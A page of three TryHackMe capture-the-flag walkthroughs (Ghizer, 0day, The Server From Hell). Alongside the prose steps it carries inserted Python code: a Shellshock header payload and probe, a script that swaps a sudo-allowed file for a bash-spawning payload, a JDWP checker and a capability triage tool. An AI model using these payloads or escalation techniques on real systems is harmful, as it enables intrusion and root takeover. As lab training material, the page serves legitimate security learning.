Ghizer TryHackMe Walkthrough

Today we’re going to solve another boot2root challenge called “Ghizer“. It’s available at TryHackMe for penetration testing practice. This lab is not difficult if we have the basic knowledge needed to break these labs and pay attention to every detail we find during reconnaissance. The credit for making this lab goes to stuxnet. Let’s get started and learn how to break it down successfully.

Level: Easy

These labs are available on the TryHackMe website.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirsearch
  • Searchsploit
  • Linpeas
  • Jdb
  • Chisel

Exploiting

  • Exploit LimeSurvey < 3.16 Remote Code Execution (RCE)

Privilege Escalation

  • Abuse of Ghidra debug mode (JDWP listener)
  • Abuse of sudo permissions on a Python script
  • Capture the flag

Walkthrough

Reconnaissance

We add the IP address to the /etc/hosts file and run nmap.

Enumeration

nmap shows that the FTP service accepts anonymous logins, but the anonymous account has neither read nor write permissions, so there is nothing to take from it.

We browse the website, review its source code and sections, but find nothing useful.

We find a working WordPress installation on port 443. A hint points at the administration panel, which is protected by the WPS Hide Login plugin (the login page lives at a non-default path).

It is easy: a link at the bottom of the web page gives us the path to the administration panel.

We use the Dirsearch tool and enumerate files that reveal software versions, directories and other files.

Exploiting

We use searchsploit to look for LimeSurvey exploits and find one for Remote Code Execution (RCE).

This exploit requires valid credentials. A Google search for “LimeSurvey default credentials” gives us the default ones.

We run the exploit with the credentials found and get a shell.

The shell is very limited, so I downloaded PentestMonkey’s PHP reverse shell into the folder and executed it with netcat listening on my machine.

We have a new shell! We run the usual two commands to upgrade it to an interactive TTY.

We find the config.php file, which contains the username and password of the limeDB database.

Privilege Escalation (user Veronica)

We run the “linpeas.sh” script and, among the active connections, find a ghidraDebug process belonging to the user Veronica.

We enumerate the GhidraDebug service, which listens only on the internal interface on port 18001 (Ghidra’s debug mode exposes a JDWP listener there).
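Before forwarding the port and attaching a debugger it is worth confirming that the service really speaks JDWP. The check is simple: a JDWP agent answers the 14-byte string JDWP-Handshake with the same 14 bytes. The following is an added example, not code from the original walkthrough; the fake server exists only so the check can be run offline, and the host and port in the usage line are assumptions.

```python
"""Added example: confirm that a TCP port is a JDWP (Java Debug Wire Protocol)
listener before forwarding it and attaching jdb. Not part of the original
walkthrough; the fake server is a constructed stand-in for testing offline.
"""
import socket
import threading

HANDSHAKE = b"JDWP-Handshake"  # 14-byte magic, echoed back verbatim by a JDWP agent


def is_jdwp(host: str, port: int, timeout: float = 3.0) -> bool:
    """Send the JDWP handshake and report whether the peer echoes it back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(HANDSHAKE)
            reply = b""
            # A real agent replies with exactly the same 14 bytes; read until we
            # have them or the peer stops talking (banner services close early).
            while len(reply) < len(HANDSHAKE):
                chunk = sock.recv(len(HANDSHAKE) - len(reply))
                if not chunk:
                    break
                reply += chunk
            return reply == HANDSHAKE
    except OSError:  # refused, timeout, reset: not a usable JDWP listener
        return False


def fake_server(banner: bytes, echo_handshake: bool) -> int:
    """Throwaway loopback listener for testing only; returns the bound port.

    With echo_handshake=True it behaves like a JDWP agent, otherwise it
    answers with `banner` (e.g. an SSH banner) like an unrelated service.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve() -> None:
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(64)
            conn.sendall(HANDSHAKE if echo_handshake and data == HANDSHAKE else banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Assumed target: the port forwarded to our machine by chisel.
    print("JDWP on 127.0.0.1:18001:", is_jdwp("127.0.0.1", 18001))
```

Once the check returns True, the port is safe to hand to jdb; if it returns False on a forwarded port, verify the forward itself before debugging further.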

To turn the GhidraDebug listener into remote command execution I used this guide from my friends at “HackPlayers“.

We use “Chisel” to forward the internal port 18001 to port 18001 on our local machine.

We use the jdb tool to attach to the forwarded port on localhost, run the “classpath” command and see the home directory of the user “Veronica“ in the output.

Listing the loaded classes shows “WatchManager$WatchRunnable“, so we’re on the right track: that runnable executes periodically, which gives us a place to break into.

We set a breakpoint on it with jdb’s “stop” command and wait a few seconds until jdb reports that the breakpoint has been hit.

With netcat listening on our machine, we execute the following command from the jdb prompt; it runs in the context of the debugged process and returns a shell as the user “Veronica“.

With access to this user we can read the user.txt flag.

Privilege Escalation (root)

We run “sudo -l“ and see that we may execute a Python script called “base.py“ as root.

We try to add a line to it, but we do not have permission to edit the file. We can, however, delete it: unlinking a file needs write permission on the directory, not on the file itself.

We delete the file, create a new one with the same name that spawns a bash shell, run it with sudo, escalate to root and read the flag.
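The step above relies on a permission detail that is easy to miss: the file is read-only, but the directory is not. The following added example (not code from the original walkthrough) automates that check and the replacement. The script path and the sudo command in the usage note are assumptions; the sudo rule on the box only tells us the script name.

```python
"""Added example: decide whether a sudo-allowed script can be hijacked even
though the file itself is read-only, and replace it if so.

Unlinking a file requires write permission on its parent directory, not on the
file. A script we cannot edit can therefore still be deleted and recreated
under the same name with our own content. Not code from the original page.
"""
from __future__ import annotations
import os
from typing import Callable

# Payload the walkthrough describes: the replaced script just spawns a shell,
# which runs as root when the script is executed through sudo.
SHELL_PAYLOAD = "import os\nos.system('/bin/bash')\n"


def classify(path: str, writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK)) -> str | None:
    """Return how the script can be taken over, or None if it cannot.

    'writable'    : we can edit the file in place
    'replaceable' : file is read-only but its directory is writable,
                    so we can unlink it and create a new one with the same name
    The `writable` predicate is injectable so the logic can be exercised without
    changing real permissions (root would pass os.access for everything).
    """
    if writable(path):
        return "writable"
    if writable(os.path.dirname(os.path.abspath(path)) or "."):
        return "replaceable"
    return None


def replace_script(path: str, payload: str = SHELL_PAYLOAD) -> str:
    """Delete the script (if needed) and write our payload under the same name."""
    if classify(path) is None:
        raise PermissionError(f"{path}: neither the file nor its directory is writable")
    if os.path.exists(path):
        os.unlink(path)          # permitted by the directory's write bit
    with open(path, "w") as fh:  # a new inode owned by us, with any content we like
        fh.write(payload)
    return path


if __name__ == "__main__":
    # Assumed location of the script named in `sudo -l`.
    target = "/home/veronica/base.py"
    print(target, "->", classify(target))
```

After the replacement, run the script exactly as the sudo rule lists it (for example `sudo /usr/bin/python3 /home/veronica/base.py`, path assumed); a rule that names the interpreter and an absolute path only matches that precise command line.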

Author: David Utón is a Penetration Tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.

0day TryHackMe Walkthrough

Today we’re going to solve another boot2root challenge called “0day“. It’s available at TryHackMe for penetration testing practice. This lab is not difficult if we have the basic knowledge needed to break these labs and pay attention to every detail we find during reconnaissance. The credit for making this lab goes to MuirlandOracle and 0day. Let’s get started and learn how to break it down successfully.

Level: Medium

These labs are available on the TryHackMe website.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirsearch
  • Searchsploit
  • Linux-exploit-suggester.sh

Exploiting

  • Exploit Shellshock Remote Command Injection (RCI)

Privilege Escalation

  • Exploit overlayfs Local Privilege Escalation
  • Capture the flag

Walkthrough

Reconnaissance

We add the IP address to the /etc/hosts file and run nmap.

Enumeration

We browse the website, review its source code and sections, but find nothing useful.

We launch the dirsearch tool and it lists several interesting directories.

In the “backup” directory we find an RSA private key, but at least I did not need it to access the machine.

We see that we can reach the resource “/cgi-bin/test.cgi“. On other machines I have exploited a CGI script (“admin.cgi“) through the “Shellshock“ vulnerability, so this is the first thing to test.

We manually confirm that the site is vulnerable to “Shellshock“: as the image below shows, a crafted User-Agent header makes the server return the output of id.
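The manual check works because a vulnerable bash imports any environment variable whose value begins with `() {` as a function definition and then executes whatever follows the closing `};`, and mod_cgi copies request headers such as User-Agent into the CGI environment. The following is an added example of that probe, not code from the original walkthrough; the host, port and CGI path in the usage line are assumptions, and the sample responses in the comments are constructed.

```python
"""Added example: a manual Shellshock (CVE-2014-6271) probe against a CGI script.
Not code from the original walkthrough; target host/path are assumptions.
"""
from __future__ import annotations
import http.client
import re

# id(1) output always has this shape; a match means our command ran server-side.
_ID_RE = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+")


def build_payload(cmd: str = "/usr/bin/id") -> str:
    """Header value: an empty function definition followed by commands.

    A vulnerable bash runs everything after "};" while importing the variable.
    Emitting a Content-Type line and a blank line first keeps Apache from
    rejecting the CGI output as a malformed header, so the command output
    reaches the response body instead of producing a bare 500.
    """
    return f"() {{ :; }}; echo Content-Type: text/plain; echo; {cmd}"


def looks_exploited(body: str) -> bool:
    """True if the response body carries id(1) output, e.g.
    'uid=33(www-data) gid=33(www-data) groups=33(www-data)' (constructed)."""
    return _ID_RE.search(body) is not None


def probe(host: str, path: str = "/cgi-bin/test.cgi", port: int = 80,
          timeout: float = 5.0) -> tuple[int, str, bool]:
    """Send the payload in User-Agent; return (status, body, vulnerable)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": build_payload()})
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
        return resp.status, body, looks_exploited(body)
    finally:
        conn.close()


if __name__ == "__main__":
    # Assumed target from the walkthrough's /etc/hosts entry.
    status, body, vulnerable = probe("0day.thm")
    print(status, "vulnerable" if vulnerable else "not vulnerable")
    print(body[:200])
```

The same header can be sent with curl (`curl -A "$(python3 -c 'from probe import build_payload; print(build_payload())')" http://0day.thm/cgi-bin/test.cgi`, module name assumed); the point of the Python version is the `looks_exploited` check, which keys on the shape of id output rather than on the HTTP status, since a vulnerable server may still answer 500.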

Exploiting

We look for the exploit with the “searchsploit“ tool and find “34900.py“.

We run the exploit specifying the payload type, the victim host, our IP and our port. If everything goes well, we get a reverse shell.

We go to the user’s home folder and read the user.txt flag.

Privilege Escalation (root)

We run the “linux-exploit-suggester.sh” script and it lists several kernel exploits that could serve to escalate privileges.

We make use of this exploit (the overlayfs local privilege escalation for Ubuntu kernels 3.13 to 3.19): https://www.exploit-db.com/download/37292

We compile the exploit on our machine, download it onto the victim with “wget“ and run it; it gives us a shell as root and we can read the root.txt flag. Note that a binary compiled on a newer distribution can fail on the target because of glibc version mismatches; if the victim has gcc, compiling it there is the safer choice.

NOTE: If the exploit fails, the problem is probably your reverse shell; an msfvenom payload with a Metasploit handler could help 😉

Author: David Utón is a Penetration Tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.

The Server From Hell TryHackMe Walkthrough

In this article we provide the write-up of the TryHackMe room “The Server From Hell“. This is a medium-level boot2root Linux box, available for free on TryHackMe for penetration testing practice. Let’s get started and learn how to break it down successfully.

Level: Medium

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • netcat
  • Mounting NFS directory

Exploiting

  • Cracking zipfile using fcrackzip
  • Connecting to ssh port
  • Interacting with irb shell

Privilege Escalation

  • getcap to checkout file capabilities
  • Capture the flag

Walkthrough

Reconnaissance

Using nmap we perform the reconnaissance and find a large number of open ports.

Looking at the room description together with the scan, we notice something interesting: the number 12345 appears in every port’s banner. Taking that as a hint, I connected to that port.

Enumeration

Using netcat we connect to port 12345, where we find another hint that points us to the NFS port.

Following that hint, the showmount command reveals the /home/nfs export.

Now we simply mount that share.

After mounting it we find a password-protected backup.zip file.

Exploiting

Now we use fcrackzip to brute-force the zip file with a wordlist and recover the password.

Let’s unzip the file. It contains the home/hades/.ssh directory.

In home/hades/.ssh/ we find an SSH private key, a flag.txt and a hint.txt. Opening hint.txt gives us a clue that says 2500-4500.

An nmap scan of ports 2500-4500 shows that SSH is running on port 3333.

Now we connect to SSH on port 3333 using the private key we found earlier. The shell we land in is an interactive Ruby shell (irb) rather than bash, so to get a /bin/bash shell we run a shell escape from irb.

Here we find user.txt.

Privilege Escalation

Now we get a hint about getcap, which lists the binaries that carry file capabilities. One of them, tar, has cap_dac_read_search, a capability that bypasses file read permission checks and therefore gives read access to everything on the system.

With the help of GTFOBins we use tar’s capability to archive the root flag and extract it, which lets us read it.
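Reading `getcap -r / 2>/dev/null` output by eye is error-prone, and the format differs between libcap versions. The following added example (not code from the original write-up) parses both formats and flags the capabilities that on their own give file read, file write or uid control, which is exactly what turns a harmless binary like tar into a privilege escalation. The sample output is constructed.

```python
"""Added example: triage `getcap -r / 2>/dev/null` output for capabilities that
are dangerous on their own. Not code from the original write-up.

Two output formats exist:
    /usr/bin/tar = cap_dac_read_search+ep     (older libcap)
    /usr/bin/tar cap_dac_read_search=ep       (libcap 2.41 and later)
"""
from __future__ import annotations
import re
import sys

# Capability -> why it matters. cap_dac_read_search is the tar case from the
# room: it bypasses read permission checks on every file on the system.
DANGEROUS = {
    "cap_dac_read_search": "read any file (e.g. archive an unreadable file with tar)",
    "cap_dac_override": "write any file (e.g. /etc/passwd, sudoers)",
    "cap_setuid": "switch to uid 0",
    "cap_setgid": "switch to gid 0",
    "cap_sys_admin": "mount filesystems, enter namespaces and much more",
    "cap_sys_ptrace": "attach to processes of any user",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
    "cap_fowner": "bypass owner checks (chmod any file)",
}

# Constructed sample in both formats; only tar and python3.8 should be flagged.
SAMPLE_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/arping cap_net_raw,cap_net_admin=eip
"""


def parse_getcap(text: str) -> dict[str, list[str]]:
    """Map each binary path to the list of capability names it carries."""
    result: dict[str, list[str]] = {}
    for raw in text.splitlines():
        tokens = raw.strip().split()
        # The path ends at the first "=" (old format) or cap_ clause (new format);
        # searching for it keeps paths containing spaces intact.
        idx = next((i for i, t in enumerate(tokens) if t == "=" or t.startswith("cap_")), None)
        if not idx:  # empty line or no recognisable capability set
            continue
        path = " ".join(tokens[:idx])
        clauses = tokens[idx + 1:] if tokens[idx] == "=" else tokens[idx:]
        caps: list[str] = []
        for clause in clauses:
            names = re.sub(r"[+=\-][eip]*$", "", clause)  # drop the +ep / =eip flag suffix
            caps.extend(n for n in names.split(",") if n)
        result[path] = caps
    return result


def triage(text: str) -> list[tuple[str, str, str]]:
    """Return (path, capability, reason) for every dangerous capability found."""
    hits = []
    for path, caps in parse_getcap(text).items():
        for cap in caps:
            if cap in DANGEROUS:
                hits.append((path, cap, DANGEROUS[cap]))
    return hits


if __name__ == "__main__":
    # Usage on a target: getcap -r / 2>/dev/null | python3 capcheck.py (name assumed)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    for path, cap, reason in triage(text):
        print(f"{path}: {cap} -> {reason}")
```

For the tar case the capability is enough on its own: creating an archive reads the protected file (the read check is bypassed) and extracting it to stdout with `tar cf - /root/root.txt | tar xOf -` shows the contents, which is the trick GTFOBins documents for reading files with tar.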

Author: Shrishty Dayal is a cyber security enthusiast who loves to explore and gain more knowledge in the cybersecurity domain. Contact on LinkedIn.